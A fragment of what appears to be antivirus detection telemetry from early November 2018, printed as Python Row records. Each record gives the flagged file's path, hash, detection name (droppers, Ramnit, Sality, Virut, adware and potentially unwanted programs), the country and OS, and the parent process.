  Row(detection=Row(filename='mstrxu.exe', filepath='\\\\?\\C:\\ProgramData\\mstrxu.exe', filesize=81104000, name='TR/Dropper.Gen.#M300.#R3204'), hash='b10b118a4fd177f890edd54813d70c547e0b9ddcca445f3747a571881b16cd8f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:07:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='&^&^&&^^&&&^&^&^&&^&&^^^^&^&^&&&.2', filepath='d:\\\xa0\\&^&^&&^^&&&^&^&^&&^&&^^^^&^&^&&&.2', filesize=6076000, name='TR/Taranis.2690.#M1.#R1'), hash='f97eb26791108fc966ac9280a795177033c5377535b06aa969dcea59699e2e2b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:52:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134326-84a3a6d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9367480\\AVSCAN-20181102-090433-6F0A8272\\AVSCAN-20181102-134326-84A3A6D1', filesize=1020000, name='PUA/MyPCBackup.#M1.#R1'), hash='d55b192248c695cc763c8c5bd5a3d40aa91842a57756cc2ab3150227bcd41030', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:41:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[1].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[1].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:39:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01022.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01022.exe', filesize=940000, name='HEUR/APC.#M1.#R1'), hash='a4d46903d000cf72dc5e395fb4a39d264005a6ae2dec2419166aec0fdfc64348', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bb8ca49ec6c2890916ec85da5f53df729515d172386e765641566f06d2a760f5.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\BB8CA49EC6C2890916EC85DA5F53DF729515D172386E765641566F06D2A760F5.VIR', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='bb8ca49ec6c2890916ec85da5f53df729515d172386e765641566f06d2a760f5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:55:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='\\\\?\\C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='aaacceeeeaaaaccceeeeaaaccceeeeaaaaccceeeaaaeaa.aaacceeeeaaaaccceeeeaaaccceeeeaaaaccceeeaaaeaa', filepath='E:\\aaacceeeeaaaaccceeeeaaaccceeeeaaaaccceeeaaaeaa.aaacceeeeaaaaccceeeeaaaccceeeeaaaaccceeeaaaeaa', filesize=7168000, name='TR/Crypt.ZPACK.Gen7.#M300.#R603873'), hash='e965adb85cef5b53cf853b39144f8f549d80100a2399612388a6e936b5f91e7b', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-02T10:55:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libdx.dll', filepath='C:\\Program Files\\Bignox\\BigNoxVM\\RT\\libdx.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='ee98f0c94b94e2f0e9eb84326456f04d01d543b715689928220c85beba1edbb4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T16:30:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ly4ezxm_ywu.html', filepath='K:\\DRIVE E\\RIYAN\\RIYAN`s\\SKRIPSI & TESIS\\WILAS\\Tanah\\Sengketa tanah - hukumonline.com_files\\lY4eZXm_YWu.html', filesize=56000, name='W32/Chir.B.#M1.#R1'), hash='f4ed476dd0bb7b9fc35c8c2334e1404d3b70ce957bdfb9884fd8e4b865e95cef', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:29:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8c7e7172e5e46f61fb49b974dbd06a2b4524356411cfc95531356d6f4bfb6d79', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\8C7E7172E5E46F61FB49B974DBD06A2B4524356411CFC95531356D6F4BFB6D79', filesize=1856000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='8c7e7172e5e46f61fb49b974dbd06a2b4524356411cfc95531356d6f4bfb6d79', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:03:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042150-56c936d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-042150-56C936D2', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:22:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8c8c58c55a0adb41bc101195fa35fa1e3986ae52f68af4f9c73e5baf0c0724b1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\8C8C58C55A0ADB41BC101195FA35FA1E3986AE52F68AF4F9C73E5BAF0C0724B1', filesize=1344000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='8c8c58c55a0adb41bc101195fa35fa1e3986ae52f68af4f9c73e5baf0c0724b1', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='98984ad1075c0a67fc7ddbfe072a6a8985cca3bd19baea8a76d7e7d620ccb1de.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\28.03.2018-170.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1018896\\98984ad1075c0a67fc7ddbfe072a6a8985cca3bd19baea8a76d7e7d620ccb1de.MRG', filesize=576000, name='HEUR/AGEN.1018896.#M1.#R1'), hash='98984ad1075c0a67fc7ddbfe072a6a8985cca3bd19baea8a76d7e7d620ccb1de', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\28.10.2016-323.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-02T17:23:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235404-f04d62d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2aad167c\\AVSCAN-20181102-235106-D764EB07\\AVSCAN-20181102-235404-F04D62D8', filesize=512000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='f1e5ab1d31debf14da3515d039148399d424cdc8658254d7f5f53c38a5c81612', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:54:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110819-ca70ac3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110819-CA70AC3B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsi5E1D.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T23:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='alonso.exe', filepath='C:\\Program Files (x86)\\Deforming\\alonso.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='efbb5dc8bb09c6875770d4b43e51aeb97a5b6ff29d81333e8266736432b4b95a', metadata=Row(cmdline=None, country='ZA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-02T00:47:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12x18.exe', filepath='F:\\output\\12x18\\12x18.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D35334F3EDF905384E89A5B0231AE52EEFC8F64FF8995A6DF7EF28BA2B55714A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 19.0.0\\avp.exe', parentsize=619640, timestamp='2018-11-02T12:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8D7B8D7BB76EC3F3F271E272CF71A07C23EE5C036C1373B67C4BAFED4746A1DD', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8d7b8d7bb76ec3f3f271e272cf71a07c23ee5c036c1373b67c4bafed4746a1dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:54:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nshE05C.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-02T21:47:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8E71059717CA4CC753171E672E9CAD09F48398F8F71A4F5142A481B829659AF9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8e71059717ca4cc753171e672e9cad09f48398f8f71a4f5142a481b829659af9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered facod', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered facod', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='dc26e9b5291e93bbb8f1e419cf449550fd705fd81d2a415254b31a9604c2a82e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='f037f8c780ea0c3b4e11e3170b698e99790feb6c3a78ea1a02fd226b676d306f', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:18:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238997', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238997', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221336-1d6be990', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bc556bdb\\AVSCAN-20181104-221024-04D0AAB1\\AVSCAN-20181104-221336-1D6BE990', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='d0327891171e6689768c4d99a2d2e90f822f924a800631780e9908f7d20f5695', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:17:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jpsyyrym.exe', filepath='I:\\RECYCLER_DETEC (3)\\S-8-6-40-0336675170-6116534571-118242658-3858\\jpSyyrYm.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='c6fc50ef3f9b385470e04b02fd9c605618a55c98414df30ca441da2f2948969b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T14:51:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uchebnik grenadine 1.exe', filepath='D:\\Загрузки\\uchebnik grenadine 1.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='c4cd3a36487e35ce02959549d2b1c013bea9b5b5cc764254261522448c70af7c', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Total Commander\\TOTALCMD.EXE', parentsize=3737512, timestamp='2018-11-04T12:12:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ccbe', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ccbe', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:40:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023fbc1', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023fbc1', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:22:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140331-f9a04c39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140331-F9A04C39', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='bfc42fbb92f0aadad7f76bdbee2a1605fb9ec584c65fdbecce239d5bac26b2a0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:11:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D3A83824DDD62393CEA8F2B51208D43938DD426E6D4BA6B47C516821EE0FE21A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:31:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2b1cbb358b96971b91ba31271f3b8474c336160d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2b1cbb358b96971b91ba31271f3b8474c336160d', filesize=2112000, name='HEUR/AGEN.1027112.#M1.#R1'), hash='ecb42e734b7897abde09fa4036fa425eecb3e972282db06123abe26741275ccd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:12:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e8c0f3538f1491f287def2a2a1bfea05a0da164bb365522b2294b772871b7a25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-04T01:37:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:54:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='privacy', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-29-004520/Macintosh HD/Applications/Mac Auto Fixer.app/Contents/PlugIns/Privacy.plugin/Contents/MacOS/Privacy', filesize=748000, name='OSX/GT32SupportGeeks.guhch.#M0.#R0'), hash='e22ee5368f3d08e28aae4acd1dd0994f2ed34fdd0ab162ba8d6e175daf0d26b0', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:31:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150309-13ac6e62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79ee4b76\\AVSCAN-20181104-150242-0E3897CB\\AVSCAN-20181104-150309-13AC6E62', filesize=80000, name='TR/Ghokswa.jlssq.#M1.#R1'), hash='fa0ef7cb9d547661d7f48dca8bd1d69c570339caf685aeb3a79b29356344437e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:03:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ibmpmsvc.exe', filepath='C:\\Drivers\\Chipset\\NoteBook\\1\\x86\\ibmpmsvc.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ddbf5b8ef9ea199df9925fe476bc7b4be31e235cfd3e98e987cf80c24f7e4a35', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:18:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F625D34E7133D32BE2A1A1D977F33E34D4757933BADFDDE3834B86EA78986422', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f625d34e7133d32be2a1a1d977f33e34d4757933badfdde3834b86ea78986422', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:41:17Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='tab gabung sept 11.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2011\\NOM TAB GABUNG SEPT 11\\TAB GABUNG SEPT 11.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:18Z'), dt=datetime.date(2018, 11, 2)),
